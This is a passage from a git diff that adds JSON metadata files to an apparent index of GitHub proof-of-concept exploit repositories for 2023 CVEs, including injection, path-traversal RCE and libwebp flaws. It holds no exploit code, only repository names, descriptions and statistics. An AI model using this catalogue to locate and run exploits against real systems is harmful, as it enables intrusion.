"id": 741537406, + "name": "CVE-2023-48104", + "full_name": "E1tex\/CVE-2023-48104", + "owner": { + "login": "E1tex", + "id": 134239936, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134239936?v=4", + "html_url": "https:\/\/github.com\/E1tex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/E1tex\/CVE-2023-48104", + "description": "HTML Injection in Alinto\/SOGo Web Client", + "fork": false, + "created_at": "2024-01-10T15:49:48Z", + "updated_at": "2024-01-10T16:09:29Z", + "pushed_at": "2024-01-10T16:09:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48123.json b/2023/CVE-2023-48123.json new file mode 100644 index 0000000000..684c6c4536 --- /dev/null +++ b/2023/CVE-2023-48123.json @@ -0,0 +1,33 @@ +[ + { + "id": 719849140, + "name": "CVE-2023-48123", + "full_name": "NHPT\/CVE-2023-48123", + "owner": { + "login": "NHPT", + "id": 42366434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42366434?v=4", + "html_url": "https:\/\/github.com\/NHPT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NHPT\/CVE-2023-48123", + "description": "CVE-2023-54436 Exp", + "fork": false, + "created_at": "2023-11-17T02:56:26Z", + "updated_at": "2023-11-17T04:12:44Z", + "pushed_at": "2023-11-17T02:56:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4813.json b/2023/CVE-2023-4813.json new file mode 100644 index 0000000000..6b1f242b98 --- /dev/null +++ b/2023/CVE-2023-4813.json @@ -0,0 +1,33 @@ +[ + { + "id": 811342524, + "name": "cve-2023-4813", + "full_name": "tnishiox\/cve-2023-4813", + "owner": { + "login": "tnishiox", + "id": 163162093, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163162093?v=4", + "html_url": "https:\/\/github.com\/tnishiox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tnishiox\/cve-2023-4813", + "description": null, + "fork": false, + "created_at": "2024-06-06T12:12:57Z", + "updated_at": "2024-07-23T13:28:24Z", + "pushed_at": "2024-06-22T12:54:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48194.json b/2023/CVE-2023-48194.json new file mode 100644 index 0000000000..6087506814 --- /dev/null +++ b/2023/CVE-2023-48194.json @@ -0,0 +1,33 @@ +[ + { + "id": 824970501, + "name": "CVE-2023-48194", + "full_name": "zt20xx\/CVE-2023-48194", + "owner": { + "login": "zt20xx", + "id": 113044696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113044696?v=4", + "html_url": "https:\/\/github.com\/zt20xx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zt20xx\/CVE-2023-48194", + "description": null, + "fork": false, + "created_at": "2024-07-06T12:37:56Z", + "updated_at": "2024-11-13T15:55:19Z", + "pushed_at": "2024-07-06T13:56:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48197.json b/2023/CVE-2023-48197.json new file mode 100644 index 0000000000..4652ed3585 --- /dev/null +++ b/2023/CVE-2023-48197.json @@ -0,0 +1,33 @@ +[ + { + "id": 718709477, + "name": "CVE-2023-48197", + "full_name": "nitipoom-jar\/CVE-2023-48197", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48197", + "description": null, + "fork": false, + "created_at": "2023-11-14T16:34:21Z", + "updated_at": "2023-11-14T16:35:24Z", + "pushed_at": "2023-11-14T16:39:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48198.json b/2023/CVE-2023-48198.json new file mode 100644 index 0000000000..59f714d06e --- /dev/null +++ b/2023/CVE-2023-48198.json @@ -0,0 +1,33 @@ +[ + { + "id": 718711709, + "name": "CVE-2023-48198", + "full_name": "nitipoom-jar\/CVE-2023-48198", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48198", + "description": null, + "fork": false, + "created_at": "2023-11-14T16:40:03Z", + "updated_at": "2023-11-14T16:45:56Z", + "pushed_at": "2023-11-14T16:46:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48199.json b/2023/CVE-2023-48199.json new file mode 100644 index 0000000000..668cefb001 --- /dev/null +++ b/2023/CVE-2023-48199.json @@ -0,0 +1,33 @@ +[ + { + "id": 718716267, + "name": "CVE-2023-48199", + "full_name": "nitipoom-jar\/CVE-2023-48199", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48199", + "description": null, + "fork": false, + "created_at": "2023-11-14T16:50:31Z", + "updated_at": "2023-11-14T16:51:45Z", + "pushed_at": "2023-11-14T16:51:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48200.json b/2023/CVE-2023-48200.json new file mode 100644 index 0000000000..dd40ab595b --- /dev/null +++ b/2023/CVE-2023-48200.json @@ -0,0 +1,33 @@ +[ + { + "id": 718721117, + "name": "CVE-2023-48200", + "full_name": "nitipoom-jar\/CVE-2023-48200", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48200", + "description": null, + "fork": false, + "created_at": "2023-11-14T17:02:07Z", + "updated_at": "2023-11-14T17:02:57Z", + "pushed_at": "2023-11-14T17:02:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4863.json b/2023/CVE-2023-4863.json new file mode 100644 index 0000000000..620acc42d5 --- /dev/null +++ b/2023/CVE-2023-4863.json @@ -0,0 +1,343 @@ +[ + { + "id": 694489315, + "name": "CVE-2023-4863", + "full_name": "mistymntncop\/CVE-2023-4863", + "owner": { + "login": "mistymntncop", + "id": 105329747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105329747?v=4", + "html_url": "https:\/\/github.com\/mistymntncop", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mistymntncop\/CVE-2023-4863", + "description": null, + "fork": false, + "created_at": "2023-09-21T05:22:51Z", + "updated_at": "2024-12-18T10:57:15Z", + "pushed_at": "2023-12-18T04:25:00Z", + "stargazers_count": 315, + "watchers_count": 315, + "has_discussions": false, + "forks_count": 48, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 48, + "watchers": 315, + "score": 0, + "subscribers_count": 15 + }, + { + "id": 696220876, + "name": "CVE-2023-4863", + "full_name": "bbaranoff\/CVE-2023-4863", + "owner": { + "login": "bbaranoff", + "id": 37385191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37385191?v=4", + "html_url": "https:\/\/github.com\/bbaranoff", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bbaranoff\/CVE-2023-4863", + "description": null, + "fork": false, + "created_at": "2023-09-25T10:33:09Z", + "updated_at": "2024-05-27T11:26:57Z", + "pushed_at": "2023-09-25T16:09:48Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 696506973, + "name": "BAD-WEBP-CVE-2023-4863", + "full_name": "talbeerysec\/BAD-WEBP-CVE-2023-4863", + "owner": { + "login": "talbeerysec", + "id": 25826743, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25826743?v=4", + "html_url": "https:\/\/github.com\/talbeerysec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/talbeerysec\/BAD-WEBP-CVE-2023-4863", + "description": "BAD-WEBP-CVE-2023-4863", + "fork": false, + "created_at": "2023-09-25T22:10:32Z", + "updated_at": "2023-10-31T10:09:27Z", + "pushed_at": "2023-09-25T22:13:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 698015658, + "name": "Find-VulnerableElectronVersion", + "full_name": "OITApps\/Find-VulnerableElectronVersion", + "owner": { + "login": "OITApps", + "id": 24635345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24635345?v=4", + "html_url": "https:\/\/github.com\/OITApps", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OITApps\/Find-VulnerableElectronVersion", + "description": "Scans an executable and determines if it was wrapped in an Electron version vulnerable to the Chromium vulnerability CVE-2023-4863\/ CVE-2023-5129", + "fork": false, + "created_at": "2023-09-29T00:42:37Z", + "updated_at": "2024-02-20T11:53:38Z", + "pushed_at": "2023-09-29T01:44:51Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 698469496, + "name": "ElectronVulnerableVersion", + "full_name": "GTGalaxi\/ElectronVulnerableVersion", + "owner": { + "login": "GTGalaxi", + "id": 10473238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10473238?v=4", + "html_url": "https:\/\/github.com\/GTGalaxi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GTGalaxi\/ElectronVulnerableVersion", + "description": "Find Electron Apps Vulnerable to CVE-2023-4863 \/ CVE-2023-5129", + "fork": false, + "created_at": "2023-09-30T02:47:16Z", + "updated_at": "2024-02-20T11:53:19Z", + "pushed_at": "2023-10-01T00:48:15Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 700661789, + "name": "libwebp-checker", + "full_name": "murphysecurity\/libwebp-checker", + "owner": { + "login": "murphysecurity", + "id": 101661127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101661127?v=4", + "html_url": "https:\/\/github.com\/murphysecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murphysecurity\/libwebp-checker", + "description": "A tool for finding vulnerable libwebp(CVE-2023-4863)", + "fork": false, + "created_at": "2023-10-05T03:28:23Z", + "updated_at": "2024-02-20T11:53:27Z", + "pushed_at": "2023-10-07T02:52:10Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 21, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 717339904, + "name": "CVE-2023-4863", + "full_name": "huiwen-yayaya\/CVE-2023-4863", + "owner": { + "login": "huiwen-yayaya", + "id": 128218264, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128218264?v=4", + "html_url": "https:\/\/github.com\/huiwen-yayaya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huiwen-yayaya\/CVE-2023-4863", + "description": null, + "fork": false, + "created_at": "2023-11-11T06:51:03Z", + "updated_at": "2024-12-18T11:01:56Z", + "pushed_at": "2024-06-08T08:18:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 733255762, + "name": "webp-CVE-2023-4863", + "full_name": "LiveOverflow\/webp-CVE-2023-4863", + "owner": { + "login": "LiveOverflow", + "id": 12161158, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12161158?v=4", + "html_url": "https:\/\/github.com\/LiveOverflow", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LiveOverflow\/webp-CVE-2023-4863", + "description": null, + "fork": false, + "created_at": "2023-12-18T23:12:25Z", + "updated_at": "2024-12-28T12:49:29Z", + "pushed_at": "2024-05-13T17:40:58Z", + "stargazers_count": 46, + "watchers_count": 46, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 46, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 733283933, + "name": "NotEnough", + "full_name": "caoweiquan322\/NotEnough", + "owner": { + "login": "caoweiquan322", + "id": 5418686, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5418686?v=4", + "html_url": "https:\/\/github.com\/caoweiquan322", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/caoweiquan322\/NotEnough", + "description": "This tool calculates tricky canonical huffman histogram for CVE-2023-4863.", + "fork": false, + "created_at": "2023-12-19T01:32:45Z", + "updated_at": "2024-01-02T15:07:30Z", + "pushed_at": "2023-12-20T15:50:01Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 26, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 752488530, + "name": "CVE-2023-4863-", + "full_name": "CrackerCat\/CVE-2023-4863-", + "owner": { + "login": "CrackerCat", + "id": 17995064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4", + "html_url": "https:\/\/github.com\/CrackerCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2023-4863-", + "description": "Triggering the famous libweb 0day vuln with libfuzzer", + "fork": false, + "created_at": "2024-02-04T01:33:53Z", + "updated_at": "2024-02-04T01:33:53Z", + "pushed_at": "2024-02-03T12:51:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 753983723, + "name": "CVE-2023-4863-POC", + "full_name": "sarsaeroth\/CVE-2023-4863-POC", + "owner": { + "login": "sarsaeroth", + "id": 159212133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/159212133?v=4", + "html_url": "https:\/\/github.com\/sarsaeroth", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sarsaeroth\/CVE-2023-4863-POC", + "description": "C implementation of libwebp 0-click vulnerability", + "fork": false, + "created_at": "2024-02-07T06:58:16Z", + "updated_at": "2024-02-07T06:58:17Z", + "pushed_at": "2024-02-07T06:58:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48777.json b/2023/CVE-2023-48777.json new file mode 100644 index 0000000000..a04e8fdc7c --- /dev/null +++ b/2023/CVE-2023-48777.json @@ -0,0 +1,33 @@ +[ + { + "id": 758657821, + "name": "Elementor-3.18.0-Upload-Path-Traversal-RCE-CVE-2023-48777", + "full_name": "AkuCyberSec\/Elementor-3.18.0-Upload-Path-Traversal-RCE-CVE-2023-48777", + "owner": { + "login": "AkuCyberSec", + "id": 103601332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103601332?v=4", + "html_url": "https:\/\/github.com\/AkuCyberSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AkuCyberSec\/Elementor-3.18.0-Upload-Path-Traversal-RCE-CVE-2023-48777", + "description": null, + "fork": false, + "created_at": "2024-02-16T19:36:50Z", + "updated_at": "2024-12-25T09:16:44Z", + "pushed_at": "2024-02-16T19:39:12Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48788.json b/2023/CVE-2023-48788.json new file mode 100644 index 0000000000..1a73cdcbd7 --- /dev/null +++ b/2023/CVE-2023-48788.json @@ -0,0 +1,33 @@ +[ + { + "id": 774039594, + "name": "CVE-2023-48788", + "full_name": "horizon3ai\/CVE-2023-48788", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2023-48788", + "description": "Fortinet FortiClient EMS SQL Injection", + "fork": false, + "created_at": "2024-03-18T20:50:48Z", + "updated_at": "2024-12-19T22:41:39Z", + "pushed_at": "2024-03-20T20:42:41Z", + "stargazers_count": 45, + "watchers_count": 45, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 45, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48842.json b/2023/CVE-2023-48842.json new file mode 100644 index 0000000000..899f43c77c --- /dev/null +++ b/2023/CVE-2023-48842.json @@ -0,0 +1,33 @@ +[ + { + "id": 726637538, + "name": "CVE-2023-48842", + "full_name": "creacitysec\/CVE-2023-48842", + "owner": { + "login": "creacitysec", + "id": 151768625, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151768625?v=4", + "html_url": "https:\/\/github.com\/creacitysec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/creacitysec\/CVE-2023-48842", + "description": null, + "fork": false, + "created_at": "2023-12-02T23:21:44Z", + "updated_at": "2024-10-03T05:17:52Z", + "pushed_at": "2023-12-03T00:11:00Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48849.json b/2023/CVE-2023-48849.json new file mode 100644 index 0000000000..7a5ef3f2db --- /dev/null +++ b/2023/CVE-2023-48849.json @@ -0,0 +1,33 @@ +[ + { + "id": 726024742, + "name": "CVE-2023-48849", + "full_name": "delsploit\/CVE-2023-48849", + "owner": { + "login": "delsploit", + "id": 127108998, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127108998?v=4", + "html_url": "https:\/\/github.com\/delsploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/delsploit\/CVE-2023-48849", + "description": null, + "fork": false, + "created_at": "2023-12-01T11:24:26Z", + "updated_at": "2023-12-01T11:24:26Z", + "pushed_at": "2023-12-05T06:09:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48858.json b/2023/CVE-2023-48858.json new file mode 100644 index 0000000000..98c7426b91 --- /dev/null +++ b/2023/CVE-2023-48858.json @@ -0,0 +1,33 @@ +[ + { + "id": 744440782, + "name": "CVE-2023-48858", + "full_name": "Shumerez\/CVE-2023-48858", + "owner": { + "login": "Shumerez", + "id": 52412906, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52412906?v=4", + "html_url": "https:\/\/github.com\/Shumerez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shumerez\/CVE-2023-48858", + "description": "PoC for CVE-2023-48858", + "fork": false, + "created_at": "2024-01-17T09:59:39Z", + "updated_at": "2024-01-17T09:59:40Z", + "pushed_at": "2024-01-17T10:16:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48866.json b/2023/CVE-2023-48866.json new file mode 100644 index 0000000000..a3c49894d0 --- /dev/null +++ b/2023/CVE-2023-48866.json @@ -0,0 +1,33 @@ +[ + { + "id": 725661760, + "name": "CVE-2023-48866", + "full_name": "nitipoom-jar\/CVE-2023-48866", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48866", + "description": null, + "fork": false, + "created_at": "2023-11-30T15:59:16Z", + "updated_at": "2023-11-30T16:01:02Z", + "pushed_at": "2023-11-30T16:00:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48974.json b/2023/CVE-2023-48974.json new file mode 100644 index 0000000000..169f196f2b --- /dev/null +++ b/2023/CVE-2023-48974.json @@ -0,0 +1,33 @@ +[ + { + "id": 736802783, + "name": "CVE-2023-48974", + "full_name": "vinnie1717\/CVE-2023-48974", + "owner": { + "login": "vinnie1717", + "id": 28691535, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28691535?v=4", + "html_url": "https:\/\/github.com\/vinnie1717", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vinnie1717\/CVE-2023-48974", + "description": null, + "fork": false, + "created_at": "2023-12-28T23:24:22Z", + "updated_at": "2023-12-28T23:24:22Z", + "pushed_at": "2023-12-28T23:35:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48981.json b/2023/CVE-2023-48981.json new file mode 100644 index 0000000000..497aeac8af --- /dev/null +++ b/2023/CVE-2023-48981.json @@ -0,0 +1,33 @@ +[ + { + "id": 737775658, + "name": "CVE-2023-48981", + "full_name": "tristao-marinho\/CVE-2023-48981", + "owner": { + "login": "tristao-marinho", + "id": 101610912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101610912?v=4", + "html_url": "https:\/\/github.com\/tristao-marinho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tristao-marinho\/CVE-2023-48981", + "description": "POC CVE-2023-48981", + "fork": false, + "created_at": "2024-01-01T13:06:39Z", + "updated_at": "2024-01-01T13:06:40Z", + "pushed_at": "2024-01-01T13:18:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48982.json b/2023/CVE-2023-48982.json new file mode 100644 index 0000000000..17a1573e25 --- /dev/null +++ b/2023/CVE-2023-48982.json @@ -0,0 +1,33 @@ +[ + { + "id": 737777512, + "name": "CVE-2023-48982", + "full_name": "tristao-marinho\/CVE-2023-48982", + "owner": { + "login": "tristao-marinho", + "id": 101610912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101610912?v=4", + "html_url": "https:\/\/github.com\/tristao-marinho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tristao-marinho\/CVE-2023-48982", + "description": "POC CVE-2023-48982", + "fork": false, + "created_at": "2024-01-01T13:14:49Z", + "updated_at": "2024-01-01T13:14:49Z", + "pushed_at": "2024-01-01T13:17:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48983.json b/2023/CVE-2023-48983.json new file mode 100644 index 0000000000..05adb7a92d --- /dev/null +++ b/2023/CVE-2023-48983.json @@ -0,0 +1,33 @@ +[ + { + "id": 737778720, + "name": "CVE-2023-48983", + "full_name": "tristao-marinho\/CVE-2023-48983", + "owner": { + "login": "tristao-marinho", + "id": 101610912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101610912?v=4", + "html_url": "https:\/\/github.com\/tristao-marinho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tristao-marinho\/CVE-2023-48983", + "description": "POC CVE-2023-48983", + "fork": false, + "created_at": "2024-01-01T13:19:54Z", + "updated_at": "2024-01-02T12:18:35Z", + "pushed_at": "2024-01-01T13:23:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49002.json b/2023/CVE-2023-49002.json new file mode 100644 index 0000000000..f207a90c1f --- /dev/null +++ b/2023/CVE-2023-49002.json @@ -0,0 +1,35 @@ +[ + { + "id": 720804876, + "name": "com.sinous.voice.dialer", + "full_name": "actuator\/com.sinous.voice.dialer", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.sinous.voice.dialer", + "description": "CVE-2023-49002", + "fork": false, + "created_at": "2023-11-19T16:51:09Z", + "updated_at": "2024-01-17T19:55:42Z", + "pushed_at": "2023-11-28T08:15:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-49002" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49003.json b/2023/CVE-2023-49003.json new file mode 100644 index 0000000000..b38274f764 --- /dev/null +++ b/2023/CVE-2023-49003.json @@ -0,0 +1,35 @@ +[ + { + "id": 720827247, + "name": "com.simplemobiletools.dialer", + "full_name": "actuator\/com.simplemobiletools.dialer", + 